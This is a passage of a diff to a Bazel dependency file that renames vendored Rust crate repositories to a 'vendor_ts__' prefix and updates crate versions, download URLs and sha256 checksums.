"8d56e1b3a34eac0448e54afccf63a6b7699ef14a734b2f1b340246ccdd00c0d3", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_toolchain/0.0.258/download"], - strip_prefix = "ra_ap_toolchain-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_toolchain-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_toolchain/0.0.266/download"], + strip_prefix = "ra_ap_toolchain-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_toolchain-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_tt-0.0.258", - sha256 = "8ac261d79d3ec475a1f3b2a758d3e466f2b9d7d883fb72239b06979bf6880018", + name = "vendor_ts__ra_ap_tt-0.0.266", + sha256 = "4b974b1211e0b1e17e44b1f256ca1b4a3734d4d98f43ba09ee0a8476fc3a5b83", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_tt/0.0.258/download"], - strip_prefix = "ra_ap_tt-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_tt-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_tt/0.0.266/download"], + strip_prefix = "ra_ap_tt-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_tt-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_vfs-0.0.258", - sha256 = "ee35a171beccbb01b4ede1d9ad91dee487a3742d7cc39efd7aed6961027cbe78", + name = "vendor_ts__ra_ap_vfs-0.0.266", + sha256 = "2b004e20f901dae213cb1673111a2b56fec4f0d1c4c894b62668a0f69ce25065", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_vfs/0.0.258/download"], - strip_prefix = "ra_ap_vfs-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_vfs-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_vfs/0.0.266/download"], + strip_prefix = "ra_ap_vfs-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_vfs-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__ra_ap_vfs-notify-0.0.258", - sha256 = "b234b7651eb5d61f18d4f4643590bb8b1fd59ef766a1059741c09c540ec8cd86", + name = "vendor_ts__ra_ap_vfs-notify-0.0.266", + sha256 = "95f9e8df03407d76e044f99ef45fafd686d775508aa7d1ba836e9eca58b833a3", type = "tar.gz", - urls = ["https://static.crates.io/crates/ra_ap_vfs-notify/0.0.258/download"], - strip_prefix = "ra_ap_vfs-notify-0.0.258", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_vfs-notify-0.0.258.bazel"), + urls = ["https://static.crates.io/crates/ra_ap_vfs-notify/0.0.266/download"], + strip_prefix = "ra_ap_vfs-notify-0.0.266", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ra_ap_vfs-notify-0.0.266.bazel"), ) maybe( http_archive, - name = "vendor__rand-0.8.5", - sha256 = "34af8d1a0e25924bc5b7c43c079c942339d8f0a8b57c39049bef581b46327404", + name = "vendor_ts__rand-0.9.0", + sha256 = "3779b94aeb87e8bd4e834cee3650289ee9e0d5677f976ecdb6d219e5f4f6cd94", type = "tar.gz", - urls = ["https://static.crates.io/crates/rand/0.8.5/download"], - strip_prefix = "rand-0.8.5", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rand-0.8.5.bazel"), + urls = ["https://static.crates.io/crates/rand/0.9.0/download"], + strip_prefix = "rand-0.9.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rand-0.9.0.bazel"), ) maybe( http_archive, - name = "vendor__rand_chacha-0.3.1", - sha256 = "e6c10a63a0fa32252be49d21e7709d4d4baf8d231c2dbce1eaa8141b9b127d88", + name = "vendor_ts__rand_chacha-0.9.0", + sha256 = "d3022b5f1df60f26e1ffddd6c66e8aa15de382ae63b3a0c1bfc0e4d3e3f325cb", type = "tar.gz", - urls = ["https://static.crates.io/crates/rand_chacha/0.3.1/download"], - strip_prefix = "rand_chacha-0.3.1", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rand_chacha-0.3.1.bazel"), + urls = ["https://static.crates.io/crates/rand_chacha/0.9.0/download"], + strip_prefix = "rand_chacha-0.9.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rand_chacha-0.9.0.bazel"), ) maybe( http_archive, - name = "vendor__rand_core-0.6.4", - sha256 = "ec0be4795e2f6a28069bec0b5ff3e2ac9bafc99e6a9a7dc3547996c5c816922c", + name = "vendor_ts__rand_core-0.9.2", + sha256 = "7a509b1a2ffbe92afab0e55c8fd99dea1c280e8171bd2d88682bb20bc41cbc2c", type = "tar.gz", - urls = ["https://static.crates.io/crates/rand_core/0.6.4/download"], - strip_prefix = "rand_core-0.6.4", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rand_core-0.6.4.bazel"), + urls = ["https://static.crates.io/crates/rand_core/0.9.2/download"], + strip_prefix = "rand_core-0.9.2", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rand_core-0.9.2.bazel"), ) maybe( http_archive, - name = "vendor__rayon-1.10.0", + name = "vendor_ts__rayon-1.10.0", sha256 = "b418a60154510ca1a002a752ca9714984e21e4241e804d32555251faf8b78ffa", type = "tar.gz", urls = ["https://static.crates.io/crates/rayon/1.10.0/download"], @@ -2395,7 +2416,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__rayon-core-1.12.1", + name = "vendor_ts__rayon-core-1.12.1", sha256 = "1465873a3dfdaa8ae7cb14b4383657caab0b3e8a0aa9ae8e04b044854c8dfce2", type = "tar.gz", urls = ["https://static.crates.io/crates/rayon-core/1.12.1/download"], @@ -2405,7 +2426,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__redox_syscall-0.5.8", + name = "vendor_ts__redox_syscall-0.5.8", sha256 = "03a862b389f93e68874fbf580b9de08dd02facb9a788ebadaf4a3fd33cf58834", type = "tar.gz", urls = ["https://static.crates.io/crates/redox_syscall/0.5.8/download"], @@ -2415,7 +2436,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__regex-1.11.1", + name = "vendor_ts__regex-1.11.1", sha256 = "b544ef1b4eac5dc2db33ea63606ae9ffcfac26c1416a2806ae0bf5f56b201191", type = "tar.gz", urls = ["https://static.crates.io/crates/regex/1.11.1/download"], @@ -2425,7 +2446,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__regex-automata-0.1.10", + name = "vendor_ts__regex-automata-0.1.10", sha256 = "6c230d73fb8d8c1b9c0b3135c5142a8acee3a0558fb8db5cf1cb65f8d7862132", type = "tar.gz", urls = ["https://static.crates.io/crates/regex-automata/0.1.10/download"], @@ -2435,7 +2456,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__regex-automata-0.4.9", + name = "vendor_ts__regex-automata-0.4.9", sha256 = "809e8dc61f6de73b46c85f4c96486310fe304c434cfa43669d7b40f711150908", type = "tar.gz", urls = ["https://static.crates.io/crates/regex-automata/0.4.9/download"], @@ -2445,7 +2466,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__regex-syntax-0.6.29", + name = "vendor_ts__regex-syntax-0.6.29", sha256 = "f162c6dd7b008981e4d40210aca20b4bd0f9b60ca9271061b07f78537722f2e1", type = "tar.gz", urls = ["https://static.crates.io/crates/regex-syntax/0.6.29/download"], @@ -2455,7 +2476,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__regex-syntax-0.8.5", + name = "vendor_ts__regex-syntax-0.8.5", sha256 = "2b15c43186be67a4fd63bee50d0303afffcef381492ebe2c5d87f324e1b8815c", type = "tar.gz", urls = ["https://static.crates.io/crates/regex-syntax/0.8.5/download"], @@ -2465,7 +2486,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__rowan-0.15.15", + name = "vendor_ts__rowan-0.15.15", sha256 = "32a58fa8a7ccff2aec4f39cc45bf5f985cec7125ab271cf681c279fd00192b49", type = "tar.gz", urls = ["https://static.crates.io/crates/rowan/0.15.15/download"], @@ -2475,7 +2496,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__rustc-hash-1.1.0", + name = "vendor_ts__rustc-hash-1.1.0", sha256 = "08d43f7aa6b08d49f382cde6a7982047c3426db949b1424bc4b7ec9ae12c6ce2", type = "tar.gz", urls = ["https://static.crates.io/crates/rustc-hash/1.1.0/download"], @@ -2485,17 +2506,27 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__rustc-hash-2.1.0", - sha256 = "c7fb8039b3032c191086b10f11f319a6e99e1e82889c5cc6046f515c9db1d497", + name = "vendor_ts__rustc-hash-2.1.1", + sha256 = "357703d41365b4b27c590e3ed91eabb1b663f07c4c084095e60cbed4362dff0d", + type = "tar.gz", + urls = ["https://static.crates.io/crates/rustc-hash/2.1.1/download"], + strip_prefix = "rustc-hash-2.1.1", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rustc-hash-2.1.1.bazel"), + ) + + maybe( + http_archive, + name = "vendor_ts__rustc-stable-hash-0.1.1", + sha256 = "2febf9acc5ee5e99d1ad0afcdbccc02d87aa3f857a1f01f825b80eacf8edfcd1", type = "tar.gz", - urls = ["https://static.crates.io/crates/rustc-hash/2.1.0/download"], - strip_prefix = "rustc-hash-2.1.0", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rustc-hash-2.1.0.bazel"), + urls = ["https://static.crates.io/crates/rustc-stable-hash/0.1.1/download"], + strip_prefix = "rustc-stable-hash-0.1.1", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.rustc-stable-hash-0.1.1.bazel"), ) maybe( new_git_repository, - name = "vendor__rustc_apfloat-0.2.1-llvm-462a31f5a5ab", + name = "vendor_ts__rustc_apfloat-0.2.1-llvm-462a31f5a5ab", commit = "096d585100636bc2e9f09d7eefec38c5b334d47b", init_submodules = True, remote = "https://github.com/redsun82/rustc_apfloat.git", @@ -2504,17 +2535,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__ryu-1.0.18", - sha256 = "f3cb5ba0dc43242ce17de99c180e96db90b235b8a9fdc9543c96d2209116bd9f", + name = "vendor_ts__ryu-1.0.19", + sha256 = "6ea1a2d0a644769cc99faa24c3ad26b379b786fe7c36fd3c546254801650e6dd", type = "tar.gz", - urls = ["https://static.crates.io/crates/ryu/1.0.18/download"], - strip_prefix = "ryu-1.0.18", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ryu-1.0.18.bazel"), + urls = ["https://static.crates.io/crates/ryu/1.0.19/download"], + strip_prefix = "ryu-1.0.19", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.ryu-1.0.19.bazel"), ) maybe( http_archive, - name = "vendor__same-file-1.0.6", + name = "vendor_ts__same-file-1.0.6", sha256 = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502", type = "tar.gz", urls = ["https://static.crates.io/crates/same-file/1.0.6/download"], @@ -2524,7 +2555,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__scoped-tls-1.0.1", + name = "vendor_ts__scoped-tls-1.0.1", sha256 = "e1cf6437eb19a8f4a6cc0f7dca544973b0b78843adbfeb3683d1a94a0024a294", type = "tar.gz", urls = ["https://static.crates.io/crates/scoped-tls/1.0.1/download"], @@ -2534,7 +2565,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__scopeguard-1.2.0", + name = "vendor_ts__scopeguard-1.2.0", sha256 = "94143f37725109f92c262ed2cf5e59bce7498c01bcc1502d7b9afe439a4e9f49", type = "tar.gz", urls = ["https://static.crates.io/crates/scopeguard/1.2.0/download"], @@ -2544,7 +2575,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__semver-1.0.24", + name = "vendor_ts__semver-1.0.24", sha256 = "3cb6eb87a131f756572d7fb904f6e7b68633f09cca868c5df1c4b8d1a694bbba", type = "tar.gz", urls = ["https://static.crates.io/crates/semver/1.0.24/download"], @@ -2554,37 +2585,37 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__serde-1.0.217", - sha256 = "02fc4265df13d6fa1d00ecff087228cc0a2b5f3c0e87e258d8b94a156e984c70", + name = "vendor_ts__serde-1.0.218", + sha256 = "e8dfc9d19bdbf6d17e22319da49161d5d0108e4188e8b680aef6299eed22df60", type = "tar.gz", - urls = ["https://static.crates.io/crates/serde/1.0.217/download"], - strip_prefix = "serde-1.0.217", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.serde-1.0.217.bazel"), + urls = ["https://static.crates.io/crates/serde/1.0.218/download"], + strip_prefix = "serde-1.0.218", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.serde-1.0.218.bazel"), ) maybe( http_archive, - name = "vendor__serde_derive-1.0.217", - sha256 = "5a9bf7cf98d04a2b28aead066b7496853d4779c9cc183c440dbac457641e19a0", + name = "vendor_ts__serde_derive-1.0.218", + sha256 = "f09503e191f4e797cb8aac08e9a4a4695c5edf6a2e70e376d961ddd5c969f82b", type = "tar.gz", - urls = ["https://static.crates.io/crates/serde_derive/1.0.217/download"], - strip_prefix = "serde_derive-1.0.217", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.serde_derive-1.0.217.bazel"), + urls = ["https://static.crates.io/crates/serde_derive/1.0.218/download"], + strip_prefix = "serde_derive-1.0.218", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.serde_derive-1.0.218.bazel"), ) maybe( http_archive, - name = "vendor__serde_json-1.0.135", - sha256 = "2b0d7ba2887406110130a978386c4e1befb98c674b4fba677954e4db976630d9", + name = "vendor_ts__serde_json-1.0.139", + sha256 = "44f86c3acccc9c65b153fe1b85a3be07fe5515274ec9f0653b4a0875731c72a6", type = "tar.gz", - urls = ["https://static.crates.io/crates/serde_json/1.0.135/download"], - strip_prefix = "serde_json-1.0.135", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.serde_json-1.0.135.bazel"), + urls = ["https://static.crates.io/crates/serde_json/1.0.139/download"], + strip_prefix = "serde_json-1.0.139", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.serde_json-1.0.139.bazel"), ) maybe( http_archive, - name = "vendor__serde_spanned-0.6.8", + name = "vendor_ts__serde_spanned-0.6.8", sha256 = "87607cb1398ed59d48732e575a4c28a7a8ebf2454b964fe3f224f2afc07909e1", type = "tar.gz", urls = ["https://static.crates.io/crates/serde_spanned/0.6.8/download"], @@ -2594,7 +2625,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__serde_with-3.12.0", + name = "vendor_ts__serde_with-3.12.0", sha256 = "d6b6f7f2fcb69f747921f79f3926bd1e203fce4fef62c268dd3abfb6d86029aa", type = "tar.gz", urls = ["https://static.crates.io/crates/serde_with/3.12.0/download"], @@ -2604,7 +2635,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__serde_with_macros-3.12.0", + name = "vendor_ts__serde_with_macros-3.12.0", sha256 = "8d00caa5193a3c8362ac2b73be6b9e768aa5a4b2f721d8f4b339600c3cb51f8e", type = "tar.gz", urls = ["https://static.crates.io/crates/serde_with_macros/3.12.0/download"], @@ -2614,7 +2645,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__serde_yaml-0.9.34-deprecated", + name = "vendor_ts__serde_yaml-0.9.34-deprecated", sha256 = "6a8b1a1a2ebf674015cc02edccce75287f1a0130d394307b36743c2f5d504b47", type = "tar.gz", urls = ["https://static.crates.io/crates/serde_yaml/0.9.34+deprecated/download"], @@ -2624,7 +2655,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__sharded-slab-0.1.7", + name = "vendor_ts__sharded-slab-0.1.7", sha256 = "f40ca3c46823713e0d4209592e8d6e826aa57e928f09752619fc696c499637f6", type = "tar.gz", urls = ["https://static.crates.io/crates/sharded-slab/0.1.7/download"], @@ -2634,7 +2665,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__shlex-1.3.0", + name = "vendor_ts__shlex-1.3.0", sha256 = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64", type = "tar.gz", urls = ["https://static.crates.io/crates/shlex/1.3.0/download"], @@ -2644,17 +2675,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__smallvec-1.13.2", - sha256 = "3c5e1a9a646d36c3599cd173a41282daf47c44583ad367b8e6837255952e5c67", + name = "vendor_ts__smallvec-1.14.0", + sha256 = "7fcf8323ef1faaee30a44a340193b1ac6814fd9b7b4e88e9d4519a3e4abe1cfd", type = "tar.gz", - urls = ["https://static.crates.io/crates/smallvec/1.13.2/download"], - strip_prefix = "smallvec-1.13.2", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.smallvec-1.13.2.bazel"), + urls = ["https://static.crates.io/crates/smallvec/1.14.0/download"], + strip_prefix = "smallvec-1.14.0", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.smallvec-1.14.0.bazel"), ) maybe( http_archive, - name = "vendor__smol_str-0.3.2", + name = "vendor_ts__smol_str-0.3.2", sha256 = "9676b89cd56310a87b93dec47b11af744f34d5fc9f367b829474eec0a891350d", type = "tar.gz", urls = ["https://static.crates.io/crates/smol_str/0.3.2/download"], @@ -2664,17 +2695,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__sptr-0.3.2", - sha256 = "3b9b39299b249ad65f3b7e96443bad61c02ca5cd3589f46cb6d610a0fd6c0d6a", - type = "tar.gz", - urls = ["https://static.crates.io/crates/sptr/0.3.2/download"], - strip_prefix = "sptr-0.3.2", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.sptr-0.3.2.bazel"), - ) - - maybe( - http_archive, - name = "vendor__stable_deref_trait-1.2.0", + name = "vendor_ts__stable_deref_trait-1.2.0", sha256 = "a8f112729512f8e442d81f95a8a7ddf2b7c6b8a1a6f509a95864142b30cab2d3", type = "tar.gz", urls = ["https://static.crates.io/crates/stable_deref_trait/1.2.0/download"], @@ -2684,7 +2705,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__streaming-iterator-0.1.9", + name = "vendor_ts__streaming-iterator-0.1.9", sha256 = "2b2231b7c3057d5e4ad0156fb3dc807d900806020c5ffa3ee6ff2c8c76fb8520", type = "tar.gz", urls = ["https://static.crates.io/crates/streaming-iterator/0.1.9/download"], @@ -2694,7 +2715,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__strsim-0.11.1", + name = "vendor_ts__strsim-0.11.1", sha256 = "7da8b5736845d9f2fcb837ea5d9e2628564b3b043a70948a3f0b778838c5fb4f", type = "tar.gz", urls = ["https://static.crates.io/crates/strsim/0.11.1/download"], @@ -2704,17 +2725,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__syn-2.0.96", - sha256 = "d5d0adab1ae378d7f53bdebc67a39f1f151407ef230f0ce2883572f5d8985c80", + name = "vendor_ts__syn-2.0.98", + sha256 = "36147f1a48ae0ec2b5b3bc5b537d267457555a10dc06f3dbc8cb11ba3006d3b1", type = "tar.gz", - urls = ["https://static.crates.io/crates/syn/2.0.96/download"], - strip_prefix = "syn-2.0.96", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.syn-2.0.96.bazel"), + urls = ["https://static.crates.io/crates/syn/2.0.98/download"], + strip_prefix = "syn-2.0.98", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.syn-2.0.98.bazel"), ) maybe( http_archive, - name = "vendor__synstructure-0.13.1", + name = "vendor_ts__synstructure-0.13.1", sha256 = "c8af7666ab7b6390ab78131fb5b0fce11d6b7a6951602017c35fa82800708971", type = "tar.gz", urls = ["https://static.crates.io/crates/synstructure/0.13.1/download"], @@ -2724,7 +2745,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__text-size-1.1.1", + name = "vendor_ts__text-size-1.1.1", sha256 = "f18aa187839b2bdb1ad2fa35ead8c4c2976b64e4363c386d45ac0f7ee85c9233", type = "tar.gz", urls = ["https://static.crates.io/crates/text-size/1.1.1/download"], @@ -2734,7 +2755,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__thiserror-1.0.69", + name = "vendor_ts__thiserror-1.0.69", sha256 = "b6aaf5339b578ea85b50e080feb250a3e8ae8cfcdff9a461c9ec2904bc923f52", type = "tar.gz", urls = ["https://static.crates.io/crates/thiserror/1.0.69/download"], @@ -2744,7 +2765,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__thiserror-impl-1.0.69", + name = "vendor_ts__thiserror-impl-1.0.69", sha256 = "4fee6c4efc90059e10f81e6d42c60a18f76588c3d74cb83a0b242a2b6c7504c1", type = "tar.gz", urls = ["https://static.crates.io/crates/thiserror-impl/1.0.69/download"], @@ -2754,7 +2775,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__thread_local-1.1.8", + name = "vendor_ts__thread_local-1.1.8", sha256 = "8b9ef9bad013ada3808854ceac7b46812a6465ba368859a37e2100283d2d719c", type = "tar.gz", urls = ["https://static.crates.io/crates/thread_local/1.1.8/download"], @@ -2764,7 +2785,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__time-0.3.37", + name = "vendor_ts__time-0.3.37", sha256 = "35e7868883861bd0e56d9ac6efcaaca0d6d5d82a2a7ec8209ff492c07cf37b21", type = "tar.gz", urls = ["https://static.crates.io/crates/time/0.3.37/download"], @@ -2774,7 +2795,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__time-core-0.1.2", + name = "vendor_ts__time-core-0.1.2", sha256 = "ef927ca75afb808a4d64dd374f00a2adf8d0fcff8e7b184af886c3c87ec4a3f3", type = "tar.gz", urls = ["https://static.crates.io/crates/time-core/0.1.2/download"], @@ -2784,7 +2805,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__time-macros-0.2.19", + name = "vendor_ts__time-macros-0.2.19", sha256 = "2834e6017e3e5e4b9834939793b282bc03b37a3336245fa820e35e233e2a85de", type = "tar.gz", urls = ["https://static.crates.io/crates/time-macros/0.2.19/download"], @@ -2794,17 +2815,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__toml-0.8.19", - sha256 = "a1ed1f98e3fdc28d6d910e6737ae6ab1a93bf1985935a1193e68f93eeb68d24e", + name = "vendor_ts__toml-0.8.20", + sha256 = "cd87a5cdd6ffab733b2f74bc4fd7ee5fff6634124999ac278c35fc78c6120148", type = "tar.gz", - urls = ["https://static.crates.io/crates/toml/0.8.19/download"], - strip_prefix = "toml-0.8.19", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.toml-0.8.19.bazel"), + urls = ["https://static.crates.io/crates/toml/0.8.20/download"], + strip_prefix = "toml-0.8.20", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.toml-0.8.20.bazel"), ) maybe( http_archive, - name = "vendor__toml_datetime-0.6.8", + name = "vendor_ts__toml_datetime-0.6.8", sha256 = "0dd7358ecb8fc2f8d014bf86f6f638ce72ba252a2c3a2572f2a795f1d23efb41", type = "tar.gz", urls = ["https://static.crates.io/crates/toml_datetime/0.6.8/download"], @@ -2814,17 +2835,17 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__toml_edit-0.22.22", - sha256 = "4ae48d6208a266e853d946088ed816055e556cc6028c5e8e2b84d9fa5dd7c7f5", + name = "vendor_ts__toml_edit-0.22.24", + sha256 = "17b4795ff5edd201c7cd6dca065ae59972ce77d1b80fa0a84d94950ece7d1474", type = "tar.gz", - urls = ["https://static.crates.io/crates/toml_edit/0.22.22/download"], - strip_prefix = "toml_edit-0.22.22", - build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.toml_edit-0.22.22.bazel"), + urls = ["https://static.crates.io/crates/toml_edit/0.22.24/download"], + strip_prefix = "toml_edit-0.22.24", + build_file = Label("//misc/bazel/3rdparty/tree_sitter_extractors_deps:BUILD.toml_edit-0.22.24.bazel"), ) maybe( http_archive, - name = "vendor__tracing-0.1.41", + name = "vendor_ts__tracing-0.1.41", sha256 = "784e0ac535deb450455cbfa28a6f0df145ea1bb7ae51b821cf5e7927fdcfbdd0", type = "tar.gz", urls = ["https://static.crates.io/crates/tracing/0.1.41/download"], @@ -2834,7 +2855,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tracing-attributes-0.1.28", + name = "vendor_ts__tracing-attributes-0.1.28", sha256 = "395ae124c09f9e6918a2310af6038fba074bcf474ac352496d5910dd59a2226d", type = "tar.gz", urls = ["https://static.crates.io/crates/tracing-attributes/0.1.28/download"], @@ -2844,7 +2865,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tracing-core-0.1.33", + name = "vendor_ts__tracing-core-0.1.33", sha256 = "e672c95779cf947c5311f83787af4fa8fffd12fb27e4993211a84bdfd9610f9c", type = "tar.gz", urls = ["https://static.crates.io/crates/tracing-core/0.1.33/download"], @@ -2854,7 +2875,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tracing-flame-0.2.0", + name = "vendor_ts__tracing-flame-0.2.0", sha256 = "0bae117ee14789185e129aaee5d93750abe67fdc5a9a62650452bfe4e122a3a9", type = "tar.gz", urls = ["https://static.crates.io/crates/tracing-flame/0.2.0/download"], @@ -2864,7 +2885,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tracing-log-0.2.0", + name = "vendor_ts__tracing-log-0.2.0", sha256 = "ee855f1f400bd0e5c02d150ae5de3840039a3f54b025156404e34c23c03f47c3", type = "tar.gz", urls = ["https://static.crates.io/crates/tracing-log/0.2.0/download"], @@ -2874,7 +2895,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tracing-subscriber-0.3.19", + name = "vendor_ts__tracing-subscriber-0.3.19", sha256 = "e8189decb5ac0fa7bc8b96b7cb9b2701d60d48805aca84a238004d665fcc4008", type = "tar.gz", urls = ["https://static.crates.io/crates/tracing-subscriber/0.3.19/download"], @@ -2884,7 +2905,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tree-sitter-0.24.6", + name = "vendor_ts__tree-sitter-0.24.6", sha256 = "5f2434c86ba59ed15af56039cc5bf1acf8ba76ce301e32ef08827388ef285ec5", type = "tar.gz", urls = ["https://static.crates.io/crates/tree-sitter/0.24.6/download"], @@ -2894,7 +2915,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tree-sitter-embedded-template-0.23.2", + name = "vendor_ts__tree-sitter-embedded-template-0.23.2", sha256 = "790063ef14e5b67556abc0b3be0ed863fb41d65ee791cf8c0b20eb42a1fa46af", type = "tar.gz", urls = ["https://static.crates.io/crates/tree-sitter-embedded-template/0.23.2/download"], @@ -2904,7 +2925,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tree-sitter-json-0.24.8", + name = "vendor_ts__tree-sitter-json-0.24.8", sha256 = "4d727acca406c0020cffc6cf35516764f36c8e3dc4408e5ebe2cb35a947ec471", type = "tar.gz", urls = ["https://static.crates.io/crates/tree-sitter-json/0.24.8/download"], @@ -2914,7 +2935,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tree-sitter-language-0.1.3", + name = "vendor_ts__tree-sitter-language-0.1.3", sha256 = "c199356c799a8945965bb5f2c55b2ad9d9aa7c4b4f6e587fe9dea0bc715e5f9c", type = "tar.gz", urls = ["https://static.crates.io/crates/tree-sitter-language/0.1.3/download"], @@ -2924,7 +2945,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tree-sitter-ql-0.23.1", + name = "vendor_ts__tree-sitter-ql-0.23.1", sha256 = "80b7bcaf39acefbb199417a6ec2fd0c038083ba115da3e4f4426c820dc76d386", type = "tar.gz", urls = ["https://static.crates.io/crates/tree-sitter-ql/0.23.1/download"], @@ -2934,7 +2955,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__tree-sitter-ruby-0.23.1", + name = "vendor_ts__tree-sitter-ruby-0.23.1", sha256 = "be0484ea4ef6bb9c575b4fdabde7e31340a8d2dbc7d52b321ac83da703249f95", type = "tar.gz", urls = ["https://static.crates.io/crates/tree-sitter-ruby/0.23.1/download"], @@ -2944,7 +2965,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__triomphe-0.1.14", + name = "vendor_ts__triomphe-0.1.14", sha256 = "ef8f7726da4807b58ea5c96fdc122f80702030edc33b35aff9190a51148ccc85", type = "tar.gz", urls = ["https://static.crates.io/crates/triomphe/0.1.14/download"], @@ -2954,7 +2975,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__typed-arena-2.0.2", + name = "vendor_ts__typed-arena-2.0.2", sha256 = "6af6ae20167a9ece4bcb41af5b80f8a1f1df981f6391189ce00fd257af04126a", type = "tar.gz", urls = ["https://static.crates.io/crates/typed-arena/2.0.2/download"], @@ -2964,7 +2985,7 @@ def crate_repositories(): maybe( http_archive, - name = "vendor__uncased-0.9.10", + name = "vendor_ts__uncased-0.9.10", sha256 = "e1b88fcfe09e89d3866a5c11019378088af2d24c3fbd4f0543f96b479ec90697", type = "tar.gz", urls = ["https://static.crates.io/crates/uncased/0.9.10/download"], @@ -2974,7 +2995,7 @@ def crate_repositories(): maybe( http_archive, - name 